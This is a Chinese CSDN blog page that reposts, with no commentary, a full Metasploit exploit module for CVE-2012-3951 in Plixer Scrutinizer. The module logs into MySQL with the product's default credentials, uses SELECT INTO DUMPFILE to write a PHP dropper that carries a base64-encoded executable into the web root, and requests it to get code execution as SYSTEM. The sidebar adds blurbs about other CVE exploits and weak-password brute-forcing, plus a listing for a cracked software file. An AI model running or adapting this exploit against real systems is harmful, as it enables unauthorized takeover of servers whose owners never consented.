mysql credential_Plixer Scrutinizer NetFlow and sFlow Analyzer 9 Default MySQL Credential

最新推荐文章于 2024-01-16 14:04:20 发布
最新推荐文章于 2024-01-16 14:04:20 发布
阅读量280 收藏
点赞数
文章标签: mysql credential
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_29191761/article/details/113511491
版权

##

# This file is part of the Metasploit Framework and may be subject to

# redistribution and commercial restrictions. Please see the Metasploit

# Framework web site for more information on licensing and terms of use.

# http://metasploit.com/framework/

##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

Rank = ExcellentRanking

include Msf::Exploit::Remote::MYSQL

include Msf::Exploit::Remote::HttpClient

include Msf::Exploit::EXE

def initialize(info={})

super(update_info(info,

'Name' => "Plixer Scrutinizer NetFlow and sFlow Analyzer 9 Default MySQL Credential",

'Description' => %q{

This exploits an insecure config found in Scrutinizer NetFlow & sFlow Analyzer.

By default, the software installs a default password in MySQL, and binds the

service to "0.0.0.0". This allows any remote user to login to MySQL, and then

gain arbitrary remote code execution under the context of 'SYSTEM'. Examples

of default credentials include: 'scrutinizer:admin', and 'scrutremote:admin'.

},

'License' => MSF_LICENSE,

'Author' =>

[

'Mario Ceballos',

'Jonathan Claudius',

'Tanya Secker',

'sinn3r'

],

'References' =>

[

['CVE', '2012-3951'],

['OSVDB', '84317'],

['URL', 'http://secunia.com/advisories/50074/'],

['URL', 'https://www.trustwave.com/spiderlabs/advisories/TWSL2012-014.txt']

],

'Payload' =>

{

'BadChars' => "\x00"

},

'DefaultOptions' =>

{

'InitialAutoRunScript' => 'migrate -f'

},

'Platform' => 'win',

'Targets' =>

[

['Scrutinizer NetFlow and sFlow Analyzer 9.5.2 or older', {}]

],

'Privileged' => false,

'DisclosureDate' => "Jul 27 2012",

'DefaultTarget' => 0))

register_options(

[

OptString.new("USERNAME", [true, 'The default MySQL username', 'scrutremote']),

OptString.new("PASSWORD", [true, 'The default MySQL password', 'admin']),

OptPort.new("MYSQLPORT", [true, 'The MySQL\'s remote port', 3306]),

OptPort.new("HTTPPORT", [true, 'The HTTP Server\'s remote port', 80]),

OptString.new("TARGETURI", [true, 'The web application\'s base path', '/'])

], self.class)

# Both MySQL and HTTP need to use this, we'll have to register on the fly.

deregister_options('RPORT')

end

def check

tmp_rport = datastore['RPORT']

datastore['RPORT'] = datastore['HTTPPORT']

res = send_request_raw({'uri'=>target_uri.host})

datastore['RPORT'] = tmp_rport

if res and res.body =~ /\<title\>Scrutinizer\<\/title\>/ and

res.body =~ /\<div id\=\'.+\'\>Scrutinizer 9\.[0-5]\.[0-2]\<\/div\>/

return Exploit::CheckCode::Vulnerable

end

return Exploit::CheckCode::Safe

end

def get_php_payload(fname)

p = Rex::Text.encode_base64(generate_payload_exe)

php = %Q|

<?php

$f = fopen("#{fname}", "wb");

fwrite($f, base64_decode("#{p}"));

fclose($f);

exec("#{fname}");

?>

|

php = php.gsub(/^\t\t/, '').gsub(/\n/, ' ')

return php

end

#

# I wanna be able to choose my own destination... path!

#

def mysql_upload_binary(bindata, path)

# Modify the rport so we can use MySQL

datastore['RPORT'] = datastore['MYSQLPORT']

# Login

h = mysql_login(datastore['USERNAME'], datastore['PASSWORD'])

# The lib throws its own error message anyway:

# "Exploit failed [no-access]: RbMysql::AccessDeniedError"

return false if not h

tmp = mysql_get_temp_dir

p = bindata.unpack("H*")[0]

dest = tmp + path

mysql_query("SELECT 0x#{p} into DUMPFILE '#{dest}'")

return true

end

def exe_php(php_fname)

# Modify the rport so we can use HTTP

datastore['RPORT'] = datastore['HTTPPORT']

# Request our payload

path = File.dirname("#{target_uri.path}/.")

res = send_request_raw({'uri'=>"#{path}#{php_fname}"})

return (res and res.code == 200)

end

def cleanup

datastore['RPORT'] = @original_rport

end

def on_new_session(cli)

if cli.type != 'meterpreter'

print_error("Please remember to manually remove #{@exe_fname} and #{@php_fname}")

return

end

cli.core.use("stdapi") if not cli.ext.aliases.include?("stdapi")

begin

print_status("Deleting #{@php_fname}")

cli.fs.file.rm(@php_fname)

rescue ::Exception => e

print_error("Please note: #{@php_fname} is stil on disk.")

end

begin

print_status("Deleting #{@exe_fname}")

cli.fs.file.rm(@exe_fname)

rescue ::Exception => e

print_error("Please note: #{@exe_fname} is still on disk.")

end

end

def exploit

@original_rport = datastore['RPORT']

#

# Prepare our payload (naughty exe embedded in php)

#

@exe_fname = Rex::Text.rand_text_alpha(6) + '.exe'

p = get_php_payload(@exe_fname)

#

# Upload our payload to the html directory

#

print_status("Uploading #{p.length.to_s} bytes via MySQL...")

@php_fname = Rex::Text.rand_text_alpha(5) + '.php'

if not mysql_upload_binary(p, "../../html/#{@php_fname}")

print_error("That MySQL upload didn't work.")

return

end

#

# Execute the payload

#

print_status("Requesting #{@php_fname}...")

res = exe_php(@php_fname)

handler

end

end

金渡江
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Mysql 身份认证绕过漏洞(CVE-2012-2122)
lonmar的博客
07-24 2664
参考连接: https://www.freebuf.com/vuls/3815.html 当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。 也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。按照公告说法大约256次就能够蒙对一次。而且漏洞利用工具已经出现 受影响版本: MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 ar
最新系统漏洞--Plixer Scrutinizer SQL注入漏洞
weixin_48555088的博客
12-15 2332
最新系统漏洞2021年12月13日 受影响系统: Plixer Scrutinizer 19.0.2 描述: Plixer Scrutinizer是美国Plixer公司的一套网络流量分析系统。该系统提供流量监视、上下文取证和安全分析等功能。 Plixer Scrutinizer 19.0.2版本存在SQL注入漏洞。远程攻击者可利用该漏洞获取敏感信息。 <**> 建议: 厂商补丁: Plixer 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: https://docs.plix
Multiple Vulnerabilities in Scrutinizer NetFlow & sFlow Analyzer
cnbird's blog
08-05 1430
Trustwave SpiderLabs Security Advisory TWSL2012-014: Multiple Vulnerabilities in Scrutinizer NetFlow & sFlow Analyzer Published: 07/31/12 Version: 1.1 Vendor: Plixer International (http://www
14个网络管理员必备的最佳网络流量分析工具
喜欢Python编程的程序员柚柚呀
06-24 5606
14个网络管理员必备的最佳网络流量分析工具
这三款内网管理监控软件让你事半功倍
最新发布
域智盾软件的博客
01-16 1244
在当今高度信息化的时代,企业内部网络(内网)已经成为企业运营和发展的重要支撑。然而,随着内网规模的扩大和复杂性的增加,内网的管理和监控也变得越来越困难。为了提高内网的管理效率和工作效率,许多企业开始采用内网管理监控软件。
V2_Credential_Provider_Sample_Windows编程_
10-04
在Windows操作系统中,认证提供程序(Credential Provider)是安全组件的一部分,它负责处理用户登录时的身份验证过程。"V2_Credential_Provider_Sample"是一个关于Windows编程的项目,主要涉及如何开发自定义的认证...
flask_credential_manager:允许用户管理其凭据
03-05
flask_credential_manager 允许用户管理其凭据
PyPI 官网下载 | credential_shield_fdelgados-2.0.0-py3-none-any.whl
02-03
**PyPI 官网下载 | credential_shield_fdelgados-2.0.0-py3-none-any.whl** PyPI(Python Package Index)是Python社区的官方软件仓库,它为全球的Python开发者提供了一个发布、查找和安装Python库的平台。在Python...
信息安全_数据安全_Understand_Credential_Security:I.pdf
08-22
信息安全_数据安全_Understand_Credential_Security:I web安全 安全防御 解决方案 安全防护 金融安全
ManageEngine_NetFlowAnalyzer 9.zip
07-23
卓豪NetFlow Analyzer网络流量监控软件是专门用于监控网络活动,帮助用户了解流量构成、协议分布和用户活动的软件。与传统基于SNMP、网络探针、实时抓包分析方法不同,它利用Flow技术来收集网络中有关流量的重要信息。集流量收集、分析、报告于一体,回答谁(Who)在什么时间(When)、什么地方(Where)、执行什么行为(What)等用户最关心的问题。为全面了解企业的网络活动,合理有效分配和规划网络带宽提供科学的依据,从而保证企业的关键业务应用畅通运行。 NetFlow Analyzer网络流量监控软件支持多种Flow格式,包括:NetFlowsFlow、 cflow、J-Flow、FNF、IPFIX、NetStream、 Appflow等,可解 析多达100K Flow/秒的大流量数据,是包括思科在内的主流网络设备厂商官方推荐,以及全球众多用户赞许的网络流量监控与分析解决方案。
Netflow Analyzer 9 破解文件
12-25
NetFlow Analyzer是一款专业的带宽监控与流量 协议分析软件,帮助用户了解网络流量构成、协议分布以及用户的行为。它利用Flow技术,支持NetFlowsFlow、cflowd、J-Flow、IPFIX、NetStream等协议,集流量收集、分析、报告于一体,为优化网络性能,实现带宽最佳利用以及扩容规划提供科学的依据。
VMware 修复 Fusion 和 Horizon 中的两个提权漏洞
smellycat000的专栏
03-19 1037
聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码卫士团队VMware 修复了两个漏洞,可导致攻击者在多种软件中提升权限或造成拒绝服务条件。本周二,...
CVE-2021-21972 vCenter 远程命令执行漏洞分析
爱国小白帽
02-25 6845
报告编号:B6-2021-022501 报告来源:360NoahLab 报告作者:Ricter 更新日期:2021-02-25 0x01漏洞简介 vSphere 是 VMware 推出的虚拟化平台套件,包含 ESXi、vCenter Server 等一系列的软件。其中 vCenter Server 为 ESXi 的控制中心,可从单一控制点统一管理数据中心的所有 vSphere 主机和虚拟机,使得 IT 管理员能够提高控制能力,简化入场任务,并降低 IT 环境的管理复杂性与成本。 vSphere Clien.
从heap spray到CVE-2012-4782 (UAF)
小强的博客
10-27 810
第一部分:关于heap spray 首先在浏览器中(360、谷歌等)按F12,打开开发者模式:     在IE8+xpsp3中,打开1.html: var myvar = "CORELAN!"; alert("allocation done"); windbg附加进程,搜索字符串“CORELAN!”: 查看字符串信息: 通过以
漏洞分析之CVE-2012-4792(UAF)
4ct10n
06-29 2468
0x00 漏洞简介 2012年9月,通用漏洞与披露平台发布了一个存在IE浏览器的UAF漏洞。 报告指出:Microsoft Internet Explorer 6至9版本中的mshtml.dll中的CMshtmlEd::Exec函数中存在释放后使用漏洞。远程攻击者可利用该漏洞通过特制的网站,执行任意代码。 0x01 测试环境操作系统:Windows XP sp3浏览器:IE 8.00.6
linux 内核 usbnet,Linux kernel drivers/net/usb/cdc_ncm.c拒绝服务漏洞(CVE-2016-3951)
weixin_32942557的博客
05-11 291
Linux kernel drivers/net/usb/cdc_ncm.c拒绝服务漏洞(CVE-2016-3951)发布日期:2016-04-21更新日期:2016-05-04受影响系统:Linux kernel < 4.5.2描述:CVE(CAN) ID: CVE-2016-3951Linux Kernel是Linux操作系统的内核。Linux kernel 4.5之前版本,driver...
Mysql身份认证漏洞及利用(CVE-2012-2122)
Peter 的博客
02-13 3098
当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。 也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。按照公告说法大约256次就能够蒙对一次。而且漏洞利用工具已经出现。 受影响的产品: All MariaDB and MySQL versions up to 5.1.6...
jsp拿不到回显数据_渗透mysql数据库总结
weixin_39531582的博客
11-21 286
前言今天给大家总结一下渗透mysql的一些技巧。本文只是点到为止,不会讲的太细。一、sqlshell获取要利用mysql首先得拿到一个可以执行sql的mysql才能利用,下面就说一下几种常见姿势,欢迎补充。1、弱口令这个比较简单,网上工具很多如美杜莎,九头蛇这些比较知名的,msf也有相应的模块。我自己之前也写过一个。要是运气好的话直接跑到弱口令就直接进去,当然也可以配合社工字典来跑这样成功率更高。...
[漏洞复现]Mysql 身份认证绕过漏洞(CVE-2012-2122)
Vicl1fe的博客
12-24 3235
mysql身份验证绕过漏洞 出现这个漏洞

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值